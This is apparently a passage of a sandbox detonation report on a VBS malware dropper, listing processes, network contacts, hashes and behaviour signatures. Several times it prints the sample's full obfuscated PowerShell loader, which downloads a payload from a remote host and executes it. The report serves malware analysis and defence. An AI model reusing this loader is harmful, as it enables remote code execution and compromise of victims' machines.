GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 www.energy-serv.ro udp
RO 109.205.90.147:80 www.energy-serv.ro tcp

Files

memory/2840-4-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/2840-5-0x000000001B190000-0x000000001B472000-memory.dmp

memory/2840-6-0x00000000026F0000-0x00000000026F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B1OV4B2N0I250XZM9KHX.temp

MD5 182295c18c3a9995f3b25fc6d9d78447
SHA1 65fe1c23b4e00e0af664588fba5ad803bb93bb9b
SHA256 0587b01d956db7779222463685fc55b6a0be90d26fdbc218df826546f366ef9c
SHA512 9e44e2178e9075ba4f74a270350e56e05f65c3128949c2496070015c68bfdb207be9fda381b5f6fc140dbfc844797f1974595edee0215a20b1b1692a528d4cb0

memory/2840-11-0x0000000002440000-0x00000000024C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Magtkampens.Bib

MD5 8dd5eb68685e339e1651cbeefd0b235f
SHA1 cef3800a21bf4b8142333629fe685d1107c1ffa5
SHA256 5cf4b171cfc0ad5166bc8be93b41bcebe53aa1c1194a054271201dcbe48c84d1
SHA512 83d40812894f1fc3d03aca47686776fc6361a1fa52fe2f11ef22c2952c6b65d7422c34b47cbd61d37e77a3048358de2ee3ffc3ab67990d15abf3ca71c8d55b97

memory/2804-13-0x00000000062A0000-0x000000000872B000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

125s

Max time network

154s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A
N/A N/A C:\Windows\System32\ping.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1984 wrote to memory of 4928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 4928 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 3356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 3356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 2828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 2828 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 1984 wrote to memory of 2540 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 2540 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1984 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1984 wrote to memory of 1400 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 4876 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1400 wrote to memory of 716 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 716 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 716 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 716 wrote to memory of 4688 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping %.%.%.%

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c dir

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

